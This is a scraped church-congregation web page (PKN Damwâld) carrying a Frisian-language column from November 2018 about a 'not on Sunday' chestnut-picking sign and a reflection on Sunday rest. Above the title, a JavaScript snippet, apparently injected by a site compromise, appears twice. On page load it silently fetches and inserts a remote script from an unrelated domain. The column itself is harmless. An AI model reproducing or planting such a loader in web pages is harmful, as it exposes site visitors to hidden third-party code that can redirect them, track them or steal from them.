;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Niet op zondag ....... - PKN Damwâld

Niet op zondag …….

Gepubliceerd op: maandag 19 november 2018

Yn de hjerst bin der kastanjes en dus de tiid foar bèrn ( en Pakes en Beppes) om kastanjes te sammeljen.
Yn ùs bernejierren wie it net oars, wy makken der mei in reidstâle in pyp fan, wat tabak út heit syn sjekpûtsje deryn en smoke mar!!.
Ùtsein it smoken (wat de bêrn net mear oanleard wurd) is der net folle feroare, soe m’n sizze.
Nee, foar de bêrn is der net folle feroare, mar harren âlders…..
Yn Damwâld stjit by immen in boerd yn’e tùn foar de kastanjebeam;
Vrij kastanje zoeken, Niet op Zondag
Guon âlders fine soks mar neat en litte dat lûdop witte!!
Sa rekke ik oan’e praat mei minsken déroer en draaide de tekst om. Ik sei, soe it net wat foar jim wéze;
Seis dagen yn’e wike jo tún iepenstelle foar eltsenien, allinnich op snein is de tún (en de rest) dan foar jo sels!!
Och hea, se moesten der net oan tinke, eltsenien yn jo tún, wa wit wat der dan wol net fernield wurdt!
Nei in kertierke wienen wy it der gau oer iens; As no elk syn tún, syn hûs, of sels it hert seis dagen iepenstelt foar inoar is it net ferkeard om de sânde dei te rèsten en; ek in oar mei rést te litten.
Wa wit, kin wy ùs hert dan foar die Oare iepen stelle…..

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns